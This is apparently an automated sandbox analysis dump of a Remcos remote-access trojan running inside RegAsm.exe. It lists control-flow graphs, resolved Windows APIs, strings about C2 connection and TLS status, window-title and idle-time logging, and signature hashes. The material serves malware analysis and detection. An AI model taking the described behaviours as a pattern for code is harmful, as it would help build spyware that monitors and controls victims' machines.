                                control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 102 40f34f-40f36a call 401fab call 4139a9 call 412475 69->102 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 88 40ec13-40ec1a 79->88 89 40ec0c-40ec0e 79->89 80->79 98 40ebec-40ec02 call 401fab call 4139a9 80->98 93 40ec1c 88->93 94 40ec1e-40ec2a call 41b2c3 88->94 92 40eef1 89->92 92->49 93->94 104 40ec33-40ec37 94->104 105 40ec2c-40ec2e 94->105 98->79 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 102->126 108 40ec76-40ec89 call 401e65 call 401fab 104->108 109 40ec39 call 407716 104->109 105->104 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 118 40ec3e-40ec40 109->118 121 40ec42-40ec47 call 407738 call 407260 118->121 122 40ec4c-40ec5f call 401e65 call 401fab 118->122 121->122 122->108 141 40ec61-40ec67 122->141 157 40f3a5-40f3af call 40dd42 call 414f2a 126->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 147 40ec71 call 407260 144->147 147->108 179 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->179 180 40ed8a-40ed91 177->180 178->177 203 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->203 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 179->234 182 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 180->182 183 40ee0f-40ee19 call 409057 180->183 193 40ee1e-40ee42 call 40247c call 434798 182->193 183->193 210 40ee51 193->210 211 40ee44-40ee4f call 436e90 193->211 203->177 217 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 210->217 211->217 271 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 217->271 286 40efc1 234->286 287 40efdc-40efde 234->287 271->234 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 271->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->234 306 40eeef 288->306 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->289 291->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 306->92 347 40f103-40f11b call 401e65 call 401fab 344->347 345->347 356 40f159-40f16c call 401e65 call 401fab 347->356 357 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 347->357 367 40f1cc-40f1df call 401e65 call 401fab 356->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 416 40f287-40f28c 412->416 417 40f2cc-40f2df call 401fab call 4134ff 412->417 415 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->415 415->417 416->415 426 40f2e4-40f2e7 417->426 426->157 428 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 426->428 443 40f346-40f34b DeleteFileW 428->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                APIs
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                                  • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                • API String ID: 2830904901-3701325316
                                • Opcode ID: 747d405c528f15ab38f340b499f6c8eb85ced7579b397f1517eaf58dd5f7f014
                                • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                • Opcode Fuzzy Hash: 747d405c528f15ab38f340b499f6c8eb85ced7579b397f1517eaf58dd5f7f014
                                • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                                Control-flow Graph

                                control_flow_graph 448 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 461 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 448->461 462 414f74-414f7b Sleep 448->462 477 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->477 478 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->478 462->461 531 4150ec-4150f3 477->531 532 4150de-4150ea 477->532 478->477 533 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 531->533 532->533 560 4151d5-4151e3 call 40482d 533->560 561 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 533->561 566 415210-415225 call 404f51 call 4048c8 560->566 567 4151e5-41520b call 402093 * 2 call 41b4ef 560->567 581 415aa3-415ab5 call 404e26 call 4021fa 561->581 566->581 582 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 566->582 567->581 597 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 581->597 598 415add-415ae5 call 401e8d 581->598 648 415380-41538d call 405aa6 582->648 649 415392-4153b9 call 401fab call 4135a6 582->649 597->598 598->477 648->649 655 4153c0-41577f call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->655 656 4153bb-4153bd 649->656 782 415781 call 404aa1 655->782 656->655 783 415786-415a0a call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a0f-415a16 783->901 902 415a18-415a1f 901->902 903 415a2a-415a31 901->903 902->903 904 415a21-415a23 902->904 905 415a33-415a38 call 40b051 903->905 906 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 903->906 904->903 905->906 917 415a71-415a7d CreateThread 906->917 918 415a83-415a9e call 401fd8 * 2 call 401f09 906->918 917->918 918->581
                                APIs
                                • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$ErrorLastLocalTime
                                • String ID: | $%I64u$5.0.0 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                • API String ID: 524882891-2158775120
                                • Opcode ID: 56683a9eb9910acecfc69af6d97ab0238db08a14bf25ad7c321f103857c25174
                                • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                • Opcode Fuzzy Hash: 56683a9eb9910acecfc69af6d97ab0238db08a14bf25ad7c321f103857c25174
                                • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

                                Control-flow Graph

                                control_flow_graph 925 414d86-414dc2 926 414dc8-414ddd GetSystemDirectoryA 925->926 927 414edd-414ee8 925->927 928 414ed3 926->928 929 414de3-414e2f call 441a3e call 441a98 LoadLibraryA 926->929 928->927 934 414e31-414e3b GetProcAddress 929->934 935 414e46-414e80 call 441a3e call 441a98 LoadLibraryA 929->935 936 414e42-414e44 934->936 937 414e3d-414e40 FreeLibrary 934->937 948 414e82-414e8c GetProcAddress 935->948 949 414ecf-414ed2 935->949 936->935 939 414e97 936->939 937->936 942 414e99-414eaa GetProcAddress 939->942 943 414eb4-414eb7 FreeLibrary 942->943 944 414eac-414eb0 942->944 947 414eb9-414ebb 943->947 944->942 946 414eb2 944->946 946->947 947->949 950 414ebd-414ecd 947->950 951 414e93-414e95 948->951 952 414e8e-414e91 FreeLibrary 948->952 949->928 950->949 950->950 951->939 951->949 952->951
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                • API String ID: 2490988753-744132762
                                • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE

                                Control-flow Graph

                                APIs
                                • Sleep.KERNEL32(00001388), ref: 0040A740
                                  • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                  • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                  • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                  • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                • API String ID: 3795512280-1152054767
                                • Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                • Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

                                Control-flow Graph

                                control_flow_graph 1051 4048c8-4048e8 connect 1052 404a1b-404a1f 1051->1052 1053 4048ee-4048f1 1051->1053 1056 404a21-404a2f WSAGetLastError 1052->1056 1057 404a97 1052->1057 1054 404a17-404a19 1053->1054 1055 4048f7-4048fa 1053->1055 1058 404a99-404a9e 1054->1058 1059 404926-404930 call 420c60 1055->1059 1060 4048fc-404923 call 40531e call 402093 call 41b4ef 1055->1060 1056->1057 1061 404a31-404a34 1056->1061 1057->1058 1070 404941-40494e call 420e8f 1059->1070 1071 404932-40493c 1059->1071 1060->1059 1063 404a71-404a76 1061->1063 1064 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1061->1064 1067 404a7b-404a94 call 402093 * 2 call 41b4ef 1063->1067 1064->1057 1067->1057 1083 404950-404973 call 402093 * 2 call 41b4ef 1070->1083 1084 404987-404992 call 421a40 1070->1084 1071->1067 1113 404976-404982 call 420ca0 1083->1113 1096 4049c4-4049d1 call 420e06 1084->1096 1097 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1084->1097 1110 4049d3-4049f6 call 402093 * 2 call 41b4ef 1096->1110 1111 4049f9-404a14 CreateEventW * 2 1096->1111 1097->1113 1110->1111 1111->1054 1113->1057
                                APIs
                                • connect.WS2_32(?,?,?), ref: 004048E0
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                • WSAGetLastError.WS2_32 ref: 00404A21
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                • String ID: (I)$Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                • API String ID: 994465650-157756960
                                • Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                • Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

                                Control-flow Graph

                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0040AD38
                                • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                • GetForegroundWindow.USER32 ref: 0040AD49
                                • GetWindowTextLengthW.USER32 ref: 0040AD52
                                • GetWindowTextW.USER32 ref: 0040AD86
                                • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                • String ID: [${ User has been idle for $ minutes }$]
                                • API String ID: 911427763-3954389425
                                • Opcode ID: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                                • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                • Opcode Fuzzy Hash: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                                • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

                                Control-flow Graph

                                control_flow_graph 1206 40da34-40da59 call 401f86 1209 40db83-40dba9 call 401f04 GetLongPathNameW call 40417e 1206->1209 1210 40da5f 1206->1210 1231 40dbae-40dc1b call 40417e call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1209->1231 1212 40da70-40da7e call 41b5b4 call 401f13 1210->1212 1213 40da91-40da96 1210->1213 1214 40db51-40db56 1210->1214 1215 40daa5-40daac call 41bfb7 1210->1215 1216 40da66-40da6b 1210->1216 1217 40db58-40db5d 1210->1217 1218 40da9b-40daa0 1210->1218 1219 40db6e 1210->1219 1220 40db5f-40db64 call 43c0cf 1210->1220 1240 40da83 1212->1240 1222 40db73-40db78 call 43c0cf 1213->1222 1214->1222 1232 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1215->1232 1233 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1215->1233 1216->1222 1217->1222 1218->1222 1219->1222 1228 40db69-40db6c 1220->1228 1234 40db79-40db7e call 409057 1222->1234 1228->1219 1228->1234 1232->1240 1245 40da87-40da8c call 401f09 1233->1245 1234->1209 1240->1245 1245->1209
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                • API String ID: 82841172-425784914
                                • Opcode ID: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                                • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                • Opcode Fuzzy Hash: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                                • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

                                Control-flow Graph

                                control_flow_graph 1305 44ac49-44ac62 1306 44ac64-44ac74 call 446766 1305->1306 1307 44ac78-44ac7d 1305->1307 1306->1307 1314 44ac76 1306->1314 1309 44ac7f-44ac87 1307->1309 1310 44ac8a-44acae MultiByteToWideChar 1307->1310 1309->1310 1312 44acb4-44acc0 1310->1312 1313 44ae41-44ae54 call 434fcb 1310->1313 1315 44ad14 1312->1315 1316 44acc2-44acd3 1312->1316 1314->1307 1318 44ad16-44ad18 1315->1318 1319 44acd5-44ace4 call 457190 1316->1319 1320 44acf2-44ad03 call 446137 1316->1320 1323 44ae36 1318->1323 1324 44ad1e-44ad31 MultiByteToWideChar 1318->1324 1319->1323 1333 44acea-44acf0 1319->1333 1320->1323 1330 44ad09 1320->1330 1328 44ae38-44ae3f call 435e40 1323->1328 1324->1323 1327 44ad37-44ad49 call 448bb3 1324->1327 1335 44ad4e-44ad52 1327->1335 1328->1313 1334 44ad0f-44ad12 1330->1334 1333->1334 1334->1318 1335->1323 1337 44ad58-44ad5f 1335->1337 1338 44ad61-44ad66 1337->1338 1339 44ad99-44ada5 1337->1339 1338->1328 1342 44ad6c-44ad6e 1338->1342 1340 44ada7-44adb8 1339->1340 1341 44adf1 1339->1341 1343 44add3-44ade4 call 446137 1340->1343 1344 44adba-44adc9 call 457190 1340->1344 1345 44adf3-44adf5 1341->1345 1342->1323 1346 44ad74-44ad8e call 448bb3 1342->1346 1350 44ae2f-44ae35 call 435e40 1343->1350 1361 44ade6 1343->1361 1344->1350 1359 44adcb-44add1 1344->1359 1349 44adf7-44ae10 call 448bb3 1345->1349 1345->1350 1346->1328 1358 44ad94 1346->1358 1349->1350 1362 44ae12-44ae19 1349->1362 1350->1323 1358->1323 1363 44adec-44adef 1359->1363 1361->1363 1364 44ae55-44ae5b 1362->1364 1365 44ae1b-44ae1c 1362->1365 1363->1345 1366 44ae1d-44ae2d WideCharToMultiByte 1364->1366 1365->1366 1366->1350 1367 44ae5d-44ae64 call 435e40 1366->1367 1367->1328
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                • __freea.LIBCMT ref: 0044AE30
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • __freea.LIBCMT ref: 0044AE39
                                • __freea.LIBCMT ref: 0044AE5E
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                • String ID:
                                • API String ID: 3864826663-0
                                • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A

                                Control-flow Graph

                                control_flow_graph 1388 41c3f1-41c402 1389 41c404-41c407 1388->1389 1390 41c41a-41c421 1388->1390 1391 41c410-41c418 1389->1391 1392 41c409-41c40e 1389->1392 1393 41c422-41c43b CreateFileW 1390->1393 1391->1393 1392->1393 1394 41c441-41c446 1393->1394 1395 41c43d-41c43f 1393->1395 1397 41c461-41c472 WriteFile 1394->1397 1398 41c448-41c456 SetFilePointer 1394->1398 1396 41c47f-41c484 1395->1396 1400 41c474 1397->1400 1401 41c476-41c47d CloseHandle 1397->1401 1398->1397 1399 41c458-41c45f CloseHandle 1398->1399 1399->1395 1400->1401 1401->1396
                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
